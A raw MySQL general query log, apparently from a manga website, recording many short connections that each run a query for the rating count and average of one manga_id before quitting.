330642369 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642369 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330642369 Quit 330642370 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642370 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330642370 Quit 330642371 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642371 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330642371 Quit 330642372 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642372 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330642372 Quit 330642373 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642373 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330642373 Quit 330642374 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642374 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330642374 Quit 330642375 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642375 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330642375 Quit 330642376 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642376 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330642376 Quit 330642377 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642377 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330642377 Quit 330642378 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642378 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330642378 Quit 330642379 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642379 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330642379 Quit 330642380 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642380 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330642380 Quit 330642381 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642381 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330642381 Quit 330642382 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642382 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330642382 Quit 330642383 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642383 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330642383 Quit 330642384 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642384 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330642384 Quit 330642385 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642385 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330642385 Quit 330642386 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642386 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330642386 Quit 330642387 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642387 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330642387 Quit 330642388 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642388 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330642388 Quit 330642389 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642389 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330642389 Quit 330642390 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642390 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330642390 Quit 330642391 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642391 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330642391 Quit 330642392 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642392 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330642392 Quit 330642393 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642393 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330642393 Quit 330642394 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642394 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330642394 Quit 330642395 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642395 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330642395 Quit 330642396 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642396 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330642396 Quit 330642397 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642397 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330642397 Quit 330642398 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642398 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330642398 Quit 330642399 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642399 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330642399 Quit 330642400 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642400 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330642400 Quit 330642401 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642401 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330642401 Quit 330642402 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642402 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330642402 Quit 330642403 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642403 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330642403 Quit 330642404 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642404 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330642404 Quit 330642405 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642405 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330642405 Quit 330642406 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642406 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330642406 Quit 330642407 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642407 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330642407 Quit 330642408 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642408 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330642408 Quit 330642409 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642409 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330642409 Quit 330642410 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642410 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330642410 Quit 330642411 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642411 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330642411 Quit 330642412 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642412 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330642412 Quit 330642413 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642413 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330642413 Quit 330642414 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642414 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330642414 Quit 330642415 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642415 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330642415 Quit 330642416 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642416 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330642416 Quit 330642417 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642417 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330642417 Quit 330642418 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642418 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330642418 Quit 330642419 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642419 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330642419 Quit 330642420 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642420 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330642420 Quit 330642421 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642421 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330642421 Quit 330642422 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642422 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330642422 Quit 330642423 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642423 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330642423 Quit 330642424 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642424 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330642424 Quit 330642425 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642425 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330642425 Quit 330642426 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642426 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330642426 Quit 330642427 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642427 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330642427 Quit 330642428 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642428 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330642428 Quit 330642429 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642429 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330642429 Quit 330642430 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642430 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330642430 Quit 330642431 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642431 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330642431 Quit 330642432 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642432 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330642432 Quit 330642433 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642433 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330642433 Quit 330642434 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642434 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330642434 Quit 330642435 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642435 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330642435 Quit 330642436 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642436 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330642436 Quit 330642437 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642437 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330642437 Quit 330642438 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642438 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330642438 Quit 330642439 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642439 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330642439 Quit 330642440 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642440 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330642440 Quit 330642441 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642441 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330642441 Quit 330642442 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642442 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330642442 Quit 330642443 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642443 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330642443 Quit 330642444 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642444 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330642444 Quit 330642445 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642445 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330642445 Quit 330642446 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642446 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330642446 Quit 330642447 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642447 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330642447 Quit 330642448 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642448 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330642448 Quit 330642449 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642449 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330642449 Quit 330642450 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642450 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330642450 Quit 330642451 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642451 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330642451 Quit 330642452 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642452 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330642452 Quit 330642453 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642453 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330642453 Quit 330642454 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642454 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330642454 Quit 330642455 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642455 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330642455 Quit 330642456 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642456 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330642456 Quit 330642457 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642457 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330642457 Quit 330642458 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642458 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330642458 Quit 330642459 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642459 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330642459 Quit 330642460 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642460 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330642460 Quit 330642461 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642461 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330642461 Quit 330642462 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642462 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330642462 Quit 330642463 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642463 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330642463 Quit 330642464 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642464 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330642464 Quit 330642465 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642465 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330642465 Quit 330642466 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642466 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330642466 Quit 330642467 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642467 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330642467 Quit 330642468 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642468 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330642468 Quit 330642469 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642469 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330642469 Quit 330642470 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642470 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330642470 Quit 330642471 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642471 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330642471 Quit 330642472 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642472 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330642472 Quit 330642473 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642473 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330642473 Quit 330642474 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642474 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330642474 Quit 330642475 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642475 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330642475 Quit 330642476 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642476 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330642476 Quit 330642477 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642477 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330642477 Quit 330642478 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642478 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330642478 Quit 330642479 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642479 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330642479 Quit 330642480 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642480 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330642480 Quit 330642481 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642481 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330642481 Quit 330642482 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642482 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330642482 Quit 330642483 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642483 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330642483 Quit 330642484 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642484 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330642484 Quit 330642485 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642485 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330642485 Quit 330642486 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642486 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330642486 Quit 330642487 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642487 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330642487 Quit 330642488 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642488 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330642488 Quit 330642489 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642489 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330642489 Quit 330642490 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642490 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330642490 Quit 330642491 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642491 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330642491 Quit 330642492 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642492 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330642492 Quit 330642493 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642493 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330642493 Quit 330642494 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642494 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330642494 Quit 330642495 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642495 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330642495 Quit 330642496 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642496 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330642496 Quit 330642497 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642497 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330642497 Quit 330642498 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642498 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330642498 Quit 330642499 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642499 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330642499 Quit 330642500 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642500 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330642500 Quit 330642501 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642501 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330642501 Quit 330642502 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642502 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330642502 Quit 330642503 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642503 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330642503 Quit 330642504 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642504 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330642504 Quit 330642505 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642505 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330642505 Quit 330642506 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642506 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330642506 Quit 330642507 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642507 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330642507 Quit 330642508 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642508 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330642508 Quit 330642509 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642509 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330642509 Quit 330642510 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642510 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330642510 Quit 330642511 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642511 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330642511 Quit 330642512 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642512 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330642512 Quit 330642513 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642513 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330642513 Quit 330642514 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642514 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330642514 Quit 330642515 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642515 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330642515 Quit 330642516 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642516 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330642516 Quit 330642517 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642517 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330642517 Quit 330642518 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642518 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330642518 Quit 330642519 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642519 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330642519 Quit 330642520 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642520 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330642520 Quit 330642521 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642521 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330642521 Quit 330642522 